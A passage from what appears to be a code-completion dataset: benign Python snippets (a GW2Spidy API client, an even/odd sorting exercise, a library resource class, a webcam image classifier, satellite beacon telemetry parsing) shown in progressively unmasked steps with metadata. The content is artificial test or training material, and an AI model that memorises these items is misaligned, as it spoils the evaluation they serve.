rate.\"\"\"\n return Gw2Spidy._request('gem-price')\n\n @staticmethod\n def _paginatedRequest(allPages, *args):\n \"\"\"Handle paginated requests, downloading all pages if requested.\"\"\"\n data = []\n currentPage = 0\n while True:\n newData = Gw2Spidy._request(*(args + (str(currentPage),)))\n if not allPages:\n return newData['results']\n data.extend(newData['results'])\n currentPage = currentPage + 1\n if newData['page'] == newData['last_page']:\n break\n return data\n\n @staticmethod\n def _request(*args):\n \"\"\"Makes a request on the GW2Spidy API.\"\"\"\n url = 'http://www.gw2spidy.com/api/v0.9/json/' + '/'.join(args)\n\tr = urllib2.Request(url, headers=Gw2Spidy.headers)\n\tif 'Cookie' not in Gw2Spidy.headers:\n\t resp = urllib2.urlopen(r)\n\t if 'set-cookie' in resp.headers:\n\t\tGw2Spidy.headers['Cookie'] = resp.headers['set-cookie'].split(';', 1)[0]\n\t return json.loads(resp.read())\n return json.loads(urllib2.urlopen(r).read())\n", "step-2": null, "step-3": null, "step-4": null, "step-5": null, "step-ids": [ 0 ] }
[ 0 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> for c in range(0, 7): num = int(input(f'Digite o {c + 1} valor: ')) res = num % 2 if res == 0: n[0].append(num) else: n[1].append(num) n[0].sort() n[1].sort() print(f'Numeros pares: {n[0]}') print(f'Numeros impares {n[1]}') <|reserved_special_token_1|> <|reserved_special_token_0|> n = [[], []] for c in range(0, 7): num = int(input(f'Digite o {c + 1} valor: ')) res = num % 2 if res == 0: n[0].append(num) else: n[1].append(num) n[0].sort() n[1].sort() print(f'Numeros pares: {n[0]}') print(f'Numeros impares {n[1]}') <|reserved_special_token_1|> """ Crie um programa onde o usuario possa digitar sete valores numericos e cadastre-os em uma lisa unicaque mantenha separados os valores pares e impares. No final, mostre os valores ares e impares em ordem crescente """ n = [[],[]] for c in range(0,7): num = int(input(f'Digite o {c+1} valor: ')) res = num % 2 if res == 0: n[0].append(num) else: n[1].append(num) n[0].sort() n[1].sort() print(f'Numeros pares: {n[0]}') print(f'Numeros impares {n[1]}')
flexible
{ "blob_id": "72bbbe78db746febc9a36a676e0fa2d97bf5e81e", "index": 8849, "step-1": "<mask token>\n", "step-2": "<mask token>\nfor c in range(0, 7):\n num = int(input(f'Digite o {c + 1} valor: '))\n res = num % 2\n if res == 0:\n n[0].append(num)\n else:\n n[1].append(num)\nn[0].sort()\nn[1].sort()\nprint(f'Numeros pares: {n[0]}')\nprint(f'Numeros impares {n[1]}')\n", "step-3": "<mask token>\nn = [[], []]\nfor c in range(0, 7):\n num = int(input(f'Digite o {c + 1} valor: '))\n res = num % 2\n if res == 0:\n n[0].append(num)\n else:\n n[1].append(num)\nn[0].sort()\nn[1].sort()\nprint(f'Numeros pares: {n[0]}')\nprint(f'Numeros impares {n[1]}')\n", "step-4": "\"\"\" Crie um programa onde o usuario possa digitar sete valores numericos e cadastre-os em uma lisa unicaque mantenha\nseparados os valores pares e impares. No final, mostre os valores ares e impares em ordem crescente \"\"\"\n\nn = [[],[]]\n\nfor c in range(0,7):\n num = int(input(f'Digite o {c+1} valor: '))\n res = num % 2\n if res == 0:\n n[0].append(num)\n else:\n n[1].append(num)\nn[0].sort()\nn[1].sort()\nprint(f'Numeros pares: {n[0]}')\nprint(f'Numeros impares {n[1]}')", "step-5": null, "step-ids": [ 0, 1, 2, 3 ] }
[ 0, 1, 2, 3 ]
<|reserved_special_token_0|> class Resources: <|reserved_special_token_0|> def __init__(self, title, author, publisher, year): self.title = title self.author = author self.publisher = publisher self.year = year <|reserved_special_token_0|> <|reserved_special_token_0|> def set_publisher(self, publisher): """Method that sets the publisher of a resource object""" self.publisher = publisher <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_0|> def get_publisher(self): """Method that gets the publisher of a resource object""" return self.publisher <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Resources: <|reserved_special_token_0|> def __init__(self, title, author, publisher, year): self.title = title self.author = author self.publisher = publisher self.year = year def set_title(self, title): """Method that sets the title of a resource object""" self.title = title def set_author(self, author): """Method that sets the author of a resource object""" self.author = author def set_publisher(self, publisher): """Method that sets the publisher of a resource object""" self.publisher = publisher def set_year(self, year): """Method that sets the year of a resource object""" self.year = year <|reserved_special_token_0|> def get_author(self): """Method that gets the author of a resource object""" return self.author def get_publisher(self): """Method that gets the publisher of a resource object""" return self.publisher <|reserved_special_token_0|> <|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> class Resources: <|reserved_special_token_0|> def __init__(self, title, author, publisher, year): self.title = title self.author = author self.publisher = publisher self.year = year def set_title(self, title): """Method that sets the title of a resource object""" self.title = title def set_author(self, author): """Method that sets the author of a resource object""" self.author = author def set_publisher(self, publisher): """Method that sets the publisher of a resource object""" self.publisher = publisher def set_year(self, year): """Method that sets the year of a resource object""" self.year = year <|reserved_special_token_0|> def get_author(self): """Method that gets the author of a resource object""" return self.author def get_publisher(self): """Method that gets the publisher of a resource object""" return self.publisher <|reserved_special_token_0|> def get_resource_details(self): """Method that returns the main details of a resource object""" return ( f'[Title:"{self.get_title()}"] [Author:{self.get_author()}] [Publisher:{self.get_publisher()}] [Year:{self.get_year()}]' ) <|reserved_special_token_1|> <|reserved_special_token_0|> class Resources: <|reserved_special_token_0|> def __init__(self, title, author, publisher, year): self.title = title self.author = author self.publisher = publisher self.year = year def set_title(self, title): """Method that sets the title of a resource object""" self.title = title def set_author(self, author): """Method that sets the author of a resource object""" self.author = author def set_publisher(self, publisher): """Method that sets the publisher of a resource object""" self.publisher = publisher def set_year(self, year): """Method that sets the year of a resource object""" self.year = year <|reserved_special_token_0|> def get_author(self): """Method that gets the author of a resource object""" return self.author def get_publisher(self): """Method that gets the publisher of a resource object""" return self.publisher def get_year(self): """Method that gets the year of a resource object""" return self.year def get_resource_details(self): """Method that returns the main details of a resource object""" return ( f'[Title:"{self.get_title()}"] [Author:{self.get_author()}] [Publisher:{self.get_publisher()}] [Year:{self.get_year()}]' ) <|reserved_special_token_1|> # -*- coding: utf-8 -*- """ Created on Tue Oct 9 16:22:21 2018 @author: SDis """ #import Code.Members_module class Resources: """ Parent class for Books and eResources containg the main data fields and related setters and getters""" def __init__(self, title, author, publisher, year): self.title = title self.author = author self.publisher = publisher self.year = year #Setters def set_title (self, title): """Method that sets the title of a resource object""" self.title = title def set_author (self, author): """Method that sets the author of a resource object""" self.author = author def set_publisher (self, publisher): """Method that sets the publisher of a resource object""" self.publisher = publisher def set_year (self, year): """Method that sets the year of a resource object""" self.year = year #Getters def get_title(self): """Method that gets the title of a resource object""" return self.title def get_author(self): """Method that gets the author of a resource object""" return self.author def get_publisher(self): """Method that gets the publisher of a resource object""" return self.publisher def get_year(self): """Method that gets the year of a resource object""" return self.year def get_resource_details (self): """Method that returns the main details of a resource object""" return (f"[Title:\"{self.get_title()}\"] [Author:{self.get_author()}] [Publisher:{self.get_publisher()}] [Year:{self.get_year()}]")
flexible
{ "blob_id": "0709d413ddbe41a0c97f94b7819fdfded241d3fc", "index": 691, "step-1": "<mask token>\n\n\nclass Resources:\n <mask token>\n\n def __init__(self, title, author, publisher, year):\n self.title = title\n self.author = author\n self.publisher = publisher\n self.year = year\n <mask token>\n <mask token>\n\n def set_publisher(self, publisher):\n \"\"\"Method that sets the publisher of a resource object\"\"\"\n self.publisher = publisher\n <mask token>\n <mask token>\n <mask token>\n\n def get_publisher(self):\n \"\"\"Method that gets the publisher of a resource object\"\"\"\n return self.publisher\n <mask token>\n <mask token>\n", "step-2": "<mask token>\n\n\nclass Resources:\n <mask token>\n\n def __init__(self, title, author, publisher, year):\n self.title = title\n self.author = author\n self.publisher = publisher\n self.year = year\n\n def set_title(self, title):\n \"\"\"Method that sets the title of a resource object\"\"\"\n self.title = title\n\n def set_author(self, author):\n \"\"\"Method that sets the author of a resource object\"\"\"\n self.author = author\n\n def set_publisher(self, publisher):\n \"\"\"Method that sets the publisher of a resource object\"\"\"\n self.publisher = publisher\n\n def set_year(self, year):\n \"\"\"Method that sets the year of a resource object\"\"\"\n self.year = year\n <mask token>\n\n def get_author(self):\n \"\"\"Method that gets the author of a resource object\"\"\"\n return self.author\n\n def get_publisher(self):\n \"\"\"Method that gets the publisher of a resource object\"\"\"\n return self.publisher\n <mask token>\n <mask token>\n", "step-3": "<mask token>\n\n\nclass Resources:\n <mask token>\n\n def __init__(self, title, author, publisher, year):\n self.title = title\n self.author = author\n self.publisher = publisher\n self.year = year\n\n def set_title(self, title):\n \"\"\"Method that sets the title of a resource object\"\"\"\n self.title = title\n\n def set_author(self, author):\n \"\"\"Method that sets the author of a resource object\"\"\"\n self.author = author\n\n def set_publisher(self, publisher):\n \"\"\"Method that sets the publisher of a resource object\"\"\"\n self.publisher = publisher\n\n def set_year(self, year):\n \"\"\"Method that sets the year of a resource object\"\"\"\n self.year = year\n <mask token>\n\n def get_author(self):\n \"\"\"Method that gets the author of a resource object\"\"\"\n return self.author\n\n def get_publisher(self):\n \"\"\"Method that gets the publisher of a resource object\"\"\"\n return self.publisher\n <mask token>\n\n def get_resource_details(self):\n \"\"\"Method that returns the main details of a resource object\"\"\"\n return (\n f'[Title:\"{self.get_title()}\"] [Author:{self.get_author()}] [Publisher:{self.get_publisher()}] [Year:{self.get_year()}]'\n )\n", "step-4": "<mask token>\n\n\nclass Resources:\n <mask token>\n\n def __init__(self, title, author, publisher, year):\n self.title = title\n self.author = author\n self.publisher = publisher\n self.year = year\n\n def set_title(self, title):\n \"\"\"Method that sets the title of a resource object\"\"\"\n self.title = title\n\n def set_author(self, author):\n \"\"\"Method that sets the author of a resource object\"\"\"\n self.author = author\n\n def set_publisher(self, publisher):\n \"\"\"Method that sets the publisher of a resource object\"\"\"\n self.publisher = publisher\n\n def set_year(self, year):\n \"\"\"Method that sets the year of a resource object\"\"\"\n self.year = year\n <mask token>\n\n def get_author(self):\n \"\"\"Method that gets the author of a resource object\"\"\"\n return self.author\n\n def get_publisher(self):\n \"\"\"Method that gets the publisher of a resource object\"\"\"\n return self.publisher\n\n def get_year(self):\n \"\"\"Method that gets the year of a resource object\"\"\"\n return self.year\n\n def get_resource_details(self):\n \"\"\"Method that returns the main details of a resource object\"\"\"\n return (\n f'[Title:\"{self.get_title()}\"] [Author:{self.get_author()}] [Publisher:{self.get_publisher()}] [Year:{self.get_year()}]'\n )\n", "step-5": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Oct 9 16:22:21 2018\n\n@author: SDis\n\"\"\"\n#import Code.Members_module\n\nclass Resources:\n \"\"\" Parent class for Books and eResources containg the main data fields and related setters and getters\"\"\"\n def __init__(self, title, author, publisher, year):\n self.title = title\n self.author = author\n self.publisher = publisher\n self.year = year \n#Setters \n def set_title (self, title):\n \"\"\"Method that sets the title of a resource object\"\"\"\n self.title = title \n def set_author (self, author):\n \"\"\"Method that sets the author of a resource object\"\"\"\n self.author = author\n def set_publisher (self, publisher):\n \"\"\"Method that sets the publisher of a resource object\"\"\"\n self.publisher = publisher\n def set_year (self, year):\n \"\"\"Method that sets the year of a resource object\"\"\"\n self.year = year\n#Getters \n def get_title(self):\n \"\"\"Method that gets the title of a resource object\"\"\"\n return self.title\n def get_author(self):\n \"\"\"Method that gets the author of a resource object\"\"\"\n return self.author\n def get_publisher(self):\n \"\"\"Method that gets the publisher of a resource object\"\"\"\n return self.publisher\n def get_year(self):\n \"\"\"Method that gets the year of a resource object\"\"\"\n return self.year\n\n def get_resource_details (self):\n \"\"\"Method that returns the main details of a resource object\"\"\"\n return (f\"[Title:\\\"{self.get_title()}\\\"] [Author:{self.get_author()}] [Publisher:{self.get_publisher()}] [Year:{self.get_year()}]\")\n \n\n \n\n\n\n\n", "step-ids": [ 4, 8, 9, 10, 13 ] }
[ 4, 8, 9, 10, 13 ]
<|reserved_special_token_0|> <|reserved_special_token_1|> <|reserved_special_token_0|> if classifier is not None: print('model is loaded from ', model_file) <|reserved_special_token_0|> while 1: hasFrame, frame = cap.read() if not hasFrame: break h, w, bpp = np.shape(frame) dim = int(w / 4), int(h / 4) frame_2 = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA) cv2.imwrite('frame.jpg', frame_2) test_frame = image.load_img('frame.jpg', target_size=(60, 40)) test_frame = image.img_to_array(test_frame) test_frame = np.expand_dims(test_frame, axis=0) result = classifier.predict(test_frame) if result[0][0] == 1: prediction = 'good' text_colour = 0, 255, 0 else: prediction = 'bad' text_colour = 0, 0, 255 cv2.putText(frame, prediction, (5, 80), cv2.FONT_HERSHEY_SIMPLEX, fontScale=3, color=text_colour, thickness=3) cv2.imshow('Video', frame) k = cv2.waitKey(10) if k == 27: break cap.release() cv2.destroyAllWindows() <|reserved_special_token_1|> <|reserved_special_token_0|> model_file = 'MODELS/5-2-19_v2.h5' classifier = keras.models.load_model(model_file) if classifier is not None: print('model is loaded from ', model_file) cap = cv2.VideoCapture(0) while 1: hasFrame, frame = cap.read() if not hasFrame: break h, w, bpp = np.shape(frame) dim = int(w / 4), int(h / 4) frame_2 = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA) cv2.imwrite('frame.jpg', frame_2) test_frame = image.load_img('frame.jpg', target_size=(60, 40)) test_frame = image.img_to_array(test_frame) test_frame = np.expand_dims(test_frame, axis=0) result = classifier.predict(test_frame) if result[0][0] == 1: prediction = 'good' text_colour = 0, 255, 0 else: prediction = 'bad' text_colour = 0, 0, 255 cv2.putText(frame, prediction, (5, 80), cv2.FONT_HERSHEY_SIMPLEX, fontScale=3, color=text_colour, thickness=3) cv2.imshow('Video', frame) k = cv2.waitKey(10) if k == 27: break cap.release() cv2.destroyAllWindows() <|reserved_special_token_1|> import cv2 from keras.preprocessing import image import keras import numpy as np model_file = 'MODELS/5-2-19_v2.h5' classifier = keras.models.load_model(model_file) if classifier is not None: print('model is loaded from ', model_file) cap = cv2.VideoCapture(0) while 1: hasFrame, frame = cap.read() if not hasFrame: break h, w, bpp = np.shape(frame) dim = int(w / 4), int(h / 4) frame_2 = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA) cv2.imwrite('frame.jpg', frame_2) test_frame = image.load_img('frame.jpg', target_size=(60, 40)) test_frame = image.img_to_array(test_frame) test_frame = np.expand_dims(test_frame, axis=0) result = classifier.predict(test_frame) if result[0][0] == 1: prediction = 'good' text_colour = 0, 255, 0 else: prediction = 'bad' text_colour = 0, 0, 255 cv2.putText(frame, prediction, (5, 80), cv2.FONT_HERSHEY_SIMPLEX, fontScale=3, color=text_colour, thickness=3) cv2.imshow('Video', frame) k = cv2.waitKey(10) if k == 27: break cap.release() cv2.destroyAllWindows() <|reserved_special_token_1|> # ============================================================================= # ######################## Creator: Rhys Aeron Williams ####################### # ######################## Last update: 14th March 2019 ####################### # ============================================================================= # ============================================================================= # ####################### IMPORT THE LIBRARIES NECESSARY ###################### # ============================================================================= import cv2 from keras.preprocessing import image import keras import numpy as np # ============================================================================= # ####################### LOAD THE MODEL TO RUN ############################### # ============================================================================= model_file = "MODELS/5-2-19_v2.h5" classifier = keras.models.load_model(model_file) if classifier is not None: print('model is loaded from ', model_file) # ============================================================================= # ######################## USE THE WEBCAM ON THE LAPTOP ####################### # ============================================================================= cap = cv2.VideoCapture(0) while(1): # ============================================================================= # ######################## GET THE FRAME FROM WEBCAM ########################## # ============================================================================= hasFrame, frame = cap.read() if not hasFrame: break # ============================================================================= # ######################## RESIZE THE FRAME AND SAVE ########################## # ============================================================================= h,w,bpp = np.shape(frame) dim = (int(w/4), int(h/4)) frame_2 = cv2.resize(frame, dim, interpolation = cv2.INTER_AREA) cv2.imwrite("frame.jpg", frame_2) # ============================================================================= # ################## READ THE FRAME AND PUT INTO CLASSIFIER ################### # ============================================================================= test_frame = image.load_img('frame.jpg', target_size = (60,40)) test_frame = image.img_to_array(test_frame) test_frame = np.expand_dims(test_frame, axis = 0) result = classifier.predict(test_frame) # ============================================================================= # ####################### GET PREDICITION OF THE FRAME ######################## # ============================================================================= if result[0][0] == 1: prediction = 'good' text_colour = (0,255,0) else: prediction = 'bad' text_colour = (0,0,255) cv2.putText(frame, prediction, (5,80),cv2.FONT_HERSHEY_SIMPLEX, fontScale = 3, color = text_colour,thickness = 3) # ============================================================================= # ############################# SHOW FRAMES (VIDEO) ########################### # ============================================================================= cv2.imshow('Video', frame) k = cv2.waitKey(10) if k == 27: break cap.release() cv2.destroyAllWindows()
flexible
{ "blob_id": "e89ca4907373318bd55d0833730a30d981414992", "index": 2677, "step-1": "<mask token>\n", "step-2": "<mask token>\nif classifier is not None:\n print('model is loaded from ', model_file)\n<mask token>\nwhile 1:\n hasFrame, frame = cap.read()\n if not hasFrame:\n break\n h, w, bpp = np.shape(frame)\n dim = int(w / 4), int(h / 4)\n frame_2 = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)\n cv2.imwrite('frame.jpg', frame_2)\n test_frame = image.load_img('frame.jpg', target_size=(60, 40))\n test_frame = image.img_to_array(test_frame)\n test_frame = np.expand_dims(test_frame, axis=0)\n result = classifier.predict(test_frame)\n if result[0][0] == 1:\n prediction = 'good'\n text_colour = 0, 255, 0\n else:\n prediction = 'bad'\n text_colour = 0, 0, 255\n cv2.putText(frame, prediction, (5, 80), cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=3, color=text_colour, thickness=3)\n cv2.imshow('Video', frame)\n k = cv2.waitKey(10)\n if k == 27:\n break\ncap.release()\ncv2.destroyAllWindows()\n", "step-3": "<mask token>\nmodel_file = 'MODELS/5-2-19_v2.h5'\nclassifier = keras.models.load_model(model_file)\nif classifier is not None:\n print('model is loaded from ', model_file)\ncap = cv2.VideoCapture(0)\nwhile 1:\n hasFrame, frame = cap.read()\n if not hasFrame:\n break\n h, w, bpp = np.shape(frame)\n dim = int(w / 4), int(h / 4)\n frame_2 = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)\n cv2.imwrite('frame.jpg', frame_2)\n test_frame = image.load_img('frame.jpg', target_size=(60, 40))\n test_frame = image.img_to_array(test_frame)\n test_frame = np.expand_dims(test_frame, axis=0)\n result = classifier.predict(test_frame)\n if result[0][0] == 1:\n prediction = 'good'\n text_colour = 0, 255, 0\n else:\n prediction = 'bad'\n text_colour = 0, 0, 255\n cv2.putText(frame, prediction, (5, 80), cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=3, color=text_colour, thickness=3)\n cv2.imshow('Video', frame)\n k = cv2.waitKey(10)\n if k == 27:\n break\ncap.release()\ncv2.destroyAllWindows()\n", "step-4": "import cv2\nfrom keras.preprocessing import image\nimport keras\nimport numpy as np\nmodel_file = 'MODELS/5-2-19_v2.h5'\nclassifier = keras.models.load_model(model_file)\nif classifier is not None:\n print('model is loaded from ', model_file)\ncap = cv2.VideoCapture(0)\nwhile 1:\n hasFrame, frame = cap.read()\n if not hasFrame:\n break\n h, w, bpp = np.shape(frame)\n dim = int(w / 4), int(h / 4)\n frame_2 = cv2.resize(frame, dim, interpolation=cv2.INTER_AREA)\n cv2.imwrite('frame.jpg', frame_2)\n test_frame = image.load_img('frame.jpg', target_size=(60, 40))\n test_frame = image.img_to_array(test_frame)\n test_frame = np.expand_dims(test_frame, axis=0)\n result = classifier.predict(test_frame)\n if result[0][0] == 1:\n prediction = 'good'\n text_colour = 0, 255, 0\n else:\n prediction = 'bad'\n text_colour = 0, 0, 255\n cv2.putText(frame, prediction, (5, 80), cv2.FONT_HERSHEY_SIMPLEX,\n fontScale=3, color=text_colour, thickness=3)\n cv2.imshow('Video', frame)\n k = cv2.waitKey(10)\n if k == 27:\n break\ncap.release()\ncv2.destroyAllWindows()\n", "step-5": "# =============================================================================\n# ######################## Creator: Rhys Aeron Williams #######################\n# ######################## Last update: 14th March 2019 #######################\n# =============================================================================\n\n# =============================================================================\n# ####################### IMPORT THE LIBRARIES NECESSARY ######################\n# =============================================================================\n\nimport cv2\nfrom keras.preprocessing import image\nimport keras\nimport numpy as np\n\n\n# =============================================================================\n# ####################### LOAD THE MODEL TO RUN ###############################\n# =============================================================================\n\nmodel_file = \"MODELS/5-2-19_v2.h5\"\nclassifier = keras.models.load_model(model_file)\nif classifier is not None:\n print('model is loaded from ', model_file)\n \n\n# =============================================================================\n# ######################## USE THE WEBCAM ON THE LAPTOP #######################\n# =============================================================================\n \ncap = cv2.VideoCapture(0)\n\nwhile(1):\n\n# =============================================================================\n# ######################## GET THE FRAME FROM WEBCAM ##########################\n# =============================================================================\n\n hasFrame, frame = cap.read()\n if not hasFrame:\n break\n \n\n# =============================================================================\n# ######################## RESIZE THE FRAME AND SAVE ##########################\n# =============================================================================\n \n h,w,bpp = np.shape(frame)\n dim = (int(w/4), int(h/4))\n frame_2 = cv2.resize(frame, dim, interpolation = cv2.INTER_AREA)\n cv2.imwrite(\"frame.jpg\", frame_2)\n \n\n# =============================================================================\n# ################## READ THE FRAME AND PUT INTO CLASSIFIER ###################\n# =============================================================================\n \n test_frame = image.load_img('frame.jpg', target_size = (60,40))\n test_frame = image.img_to_array(test_frame)\n test_frame = np.expand_dims(test_frame, axis = 0)\n result = classifier.predict(test_frame)\n \n\n# =============================================================================\n# ####################### GET PREDICITION OF THE FRAME ########################\n# =============================================================================\n \n if result[0][0] == 1:\n prediction = 'good'\n text_colour = (0,255,0)\n else:\n prediction = 'bad'\n text_colour = (0,0,255)\n\n\n cv2.putText(frame, prediction, (5,80),cv2.FONT_HERSHEY_SIMPLEX, \n fontScale = 3, color = text_colour,thickness = 3)\n \n \n# =============================================================================\n# ############################# SHOW FRAMES (VIDEO) ###########################\n# =============================================================================\n \n cv2.imshow('Video', frame)\n k = cv2.waitKey(10)\n if k == 27:\n break\ncap.release()\ncv2.destroyAllWindows()\n", "step-ids": [ 0, 1, 2, 3, 4 ] }
[ 0, 1, 2, 3, 4 ]
<|reserved_special_token_0|> class ADCS2(object): def __init__(self, adcs2_data): self.gyro = tuple(struct.unpack('>hhh', adcs2_data)) <|reserved_special_token_0|> class AIS(object): def __init__(self, ais_data): self.boot_count, _, _, self.unique_mssi, _ = struct.unpack('>HhhH12s', ais_data) def __str__(self): ais_str = ("""AIS: Boot count: {} Unique MSSI: {}""" .format(self.boot_count, self.unique_mssi)) return ais_str class Beacon(object): def __init__(self, raw_data): if len(raw_data) != BEACON_LENGTH: raise ValueError('Malformed beacon (incorrect length)') self.subsystems = {} (valid, eps_raw, com_raw, adcs1_raw, adcs2_raw, ais1_raw, ais2_raw) = ( struct.unpack(('B' + '{}s' * 6).format(EPS_LENGTH, COM_LENGTH, ADCS1_LENGTH, ADCS2_LENGTH, AIS_LENGTH, AIS_LENGTH), raw_data)) eps_valid = valid & 1 << 0 com_valid = valid & 1 << 1 adcs1_valid = valid & 1 << 2 adcs2_valid = valid & 1 << 3 ais1_valid = valid & 1 << 4 ais2_valid = valid & 1 << 5 if eps_valid: self.subsystems['EPS'] = EPS(eps_raw) if com_valid: self.subsystems['COM'] = COM(com_raw) if adcs1_valid: self.subsystems['ADCS1'] = ADCS1(adcs1_raw) if adcs2_valid: self.subsystems['ADCS2'] = ADCS2(adcs2_raw) if ais1_valid: self.subsystems['AIS1'] = AIS(ais1_raw) if ais2_valid: self.subsystems['AIS2'] = AIS(ais2_raw) def __str__(self): beacon_str = '' for k, v in self.subsystems.items(): beacon_str += str(v) + '\n' return beacon_str <|reserved_special_token_1|> <|reserved_special_token_0|> class ADCS1(object): <|reserved_special_token_0|> <|reserved_special_token_0|> class ADCS2(object): def __init__(self, adcs2_data): self.gyro = tuple(struct.unpack('>hhh', adcs2_data)) def __str__(self): adcs2_str = """ADCS2: Gyro: {}""".format(self.gyro) return adcs2_str class AIS(object): def __init__(self, ais_data): self.boot_count, _, _, self.unique_mssi, _ = struct.unpack('>HhhH12s', ais_data) def __str__(self): ais_str = ("""AIS: Boot count: {} Unique MSSI: {}""" .format(self.boot_count, self.unique_mssi)) return ais_str class Beacon(object): def __init__(self, raw_data): if len(raw_data) != BEACON_LENGTH: raise ValueError('Malformed beacon (incorrect length)') self.subsystems = {} (valid, eps_raw, com_raw, adcs1_raw, adcs2_raw, ais1_raw, ais2_raw) = ( struct.unpack(('B' + '{}s' * 6).format(EPS_LENGTH, COM_LENGTH, ADCS1_LENGTH, ADCS2_LENGTH, AIS_LENGTH, AIS_LENGTH), raw_data)) eps_valid = valid & 1 << 0 com_valid = valid & 1 << 1 adcs1_valid = valid & 1 << 2 adcs2_valid = valid & 1 << 3 ais1_valid = valid & 1 << 4 ais2_valid = valid & 1 << 5 if eps_valid: self.subsystems['EPS'] = EPS(eps_raw) if com_valid: self.subsystems['COM'] = COM(com_raw) if adcs1_valid: self.subsystems['ADCS1'] = ADCS1(adcs1_raw) if adcs2_valid: self.subsystems['ADCS2'] = ADCS2(adcs2_raw) if ais1_valid: self.subsystems['AIS1'] = AIS(ais1_raw) if ais2_valid: self.subsystems['AIS2'] = AIS(ais2_raw) def __str__(self): beacon_str = '' for k, v in self.subsystems.items(): beacon_str += str(v) + '\n' return beacon_str <|reserved_special_token_1|> <|reserved_special_token_0|> BEACON_LENGTH = 84 EPS_LENGTH = 20 COM_LENGTH = 10 ADCS1_LENGTH = 7 ADCS2_LENGTH = 6 AIS_LENGTH = 20 class EPS(object): def __init__(self, eps_data): if len(eps_data) != EPS_LENGTH: raise InputException(len(eps_data), EPS_LENGTH) (self.boot_count, self.uptime, self.rt_clock, self.ping_status, self.subsystem_status, self.battery_voltage, self.cell_diff, self.battery_current, self.solar_power, self.temp, self.pa_temp, self.main_voltage) = struct.unpack('>HIIBHBbbBbbb', eps_data) self.battery_voltage *= 40 self.cell_diff *= 4 self.battery_current *= 10 self.solar_power *= 20 def __str__(self): eps_str = ( """EPS: Boot count: {0} Up time: {1} seconds Real time clock: {2} Battery voltage: {3} mV Cell difference: {4:.1f} mV Battery current: {5} mA Solar power: {6} Temperature: {7} C PA temperature: {8} C""" .format(self.boot_count, self.uptime, datetime.fromtimestamp( self.rt_clock), self.battery_voltage, self.cell_diff, self. battery_current, self.solar_power, self.temp, self.pa_temp)) return eps_str class COM(object): def __init__(self, com_data): (self.boot_count, self.packets_received, self.packets_send, self. latest_rssi, self.latest_bit_correction, self. latest_byte_correction) = struct.unpack('>HHHhBB', com_data) self.boot_count &= 8191 def __str__(self): com_str = ( """COM: Boot count: {0} Packets received: {1} Packets send: {2} Latest rssi: {3} Latest bit corrections: {4} Latest byte corrections:{5}""" .format(self.boot_count, self.packets_received, self. packets_send, self.latest_rssi, self.latest_bit_correction, self.latest_byte_correction)) return com_str class ADCS1(object): def __init__(self, adcs1_data): data = struct.unpack('>hhhB', adcs1_data) self.bdot = tuple(data[0:3]) self.state = data[3] def __str__(self): adcs1_str = """ADCS1: State: {} Bdot: {}""".format(self .state, self.bdot) return adcs1_str class ADCS2(object): def __init__(self, adcs2_data): self.gyro = tuple(struct.unpack('>hhh', adcs2_data)) def __str__(self): adcs2_str = """ADCS2: Gyro: {}""".format(self.gyro) return adcs2_str class AIS(object): def __init__(self, ais_data): self.boot_count, _, _, self.unique_mssi, _ = struct.unpack('>HhhH12s', ais_data) def __str__(self): ais_str = ("""AIS: Boot count: {} Unique MSSI: {}""" .format(self.boot_count, self.unique_mssi)) return ais_str class Beacon(object): def __init__(self, raw_data): if len(raw_data) != BEACON_LENGTH: raise ValueError('Malformed beacon (incorrect length)') self.subsystems = {} (valid, eps_raw, com_raw, adcs1_raw, adcs2_raw, ais1_raw, ais2_raw) = ( struct.unpack(('B' + '{}s' * 6).format(EPS_LENGTH, COM_LENGTH, ADCS1_LENGTH, ADCS2_LENGTH, AIS_LENGTH, AIS_LENGTH), raw_data)) eps_valid = valid & 1 << 0 com_valid = valid & 1 << 1 adcs1_valid = valid & 1 << 2 adcs2_valid = valid & 1 << 3 ais1_valid = valid & 1 << 4 ais2_valid = valid & 1 << 5 if eps_valid: self.subsystems['EPS'] = EPS(eps_raw) if com_valid: self.subsystems['COM'] = COM(com_raw) if adcs1_valid: self.subsystems['ADCS1'] = ADCS1(adcs1_raw) if adcs2_valid: self.subsystems['ADCS2'] = ADCS2(adcs2_raw) if ais1_valid: self.subsystems['AIS1'] = AIS(ais1_raw) if ais2_valid: self.subsystems['AIS2'] = AIS(ais2_raw) def __str__(self): beacon_str = '' for k, v in self.subsystems.items(): beacon_str += str(v) + '\n' return beacon_str <|reserved_special_token_1|> from datetime import datetime import struct BEACON_LENGTH = 84 EPS_LENGTH = 20 COM_LENGTH = 10 ADCS1_LENGTH = 7 ADCS2_LENGTH = 6 AIS_LENGTH = 20 class EPS(object): def __init__(self, eps_data): if len(eps_data) != EPS_LENGTH: raise InputException(len(eps_data), EPS_LENGTH) (self.boot_count, self.uptime, self.rt_clock, self.ping_status, self.subsystem_status, self.battery_voltage, self.cell_diff, self.battery_current, self.solar_power, self.temp, self.pa_temp, self.main_voltage) = struct.unpack('>HIIBHBbbBbbb', eps_data) self.battery_voltage *= 40 self.cell_diff *= 4 self.battery_current *= 10 self.solar_power *= 20 def __str__(self): eps_str = ( """EPS: Boot count: {0} Up time: {1} seconds Real time clock: {2} Battery voltage: {3} mV Cell difference: {4:.1f} mV Battery current: {5} mA Solar power: {6} Temperature: {7} C PA temperature: {8} C""" .format(self.boot_count, self.uptime, datetime.fromtimestamp( self.rt_clock), self.battery_voltage, self.cell_diff, self. battery_current, self.solar_power, self.temp, self.pa_temp)) return eps_str class COM(object): def __init__(self, com_data): (self.boot_count, self.packets_received, self.packets_send, self. latest_rssi, self.latest_bit_correction, self. latest_byte_correction) = struct.unpack('>HHHhBB', com_data) self.boot_count &= 8191 def __str__(self): com_str = ( """COM: Boot count: {0} Packets received: {1} Packets send: {2} Latest rssi: {3} Latest bit corrections: {4} Latest byte corrections:{5}""" .format(self.boot_count, self.packets_received, self. packets_send, 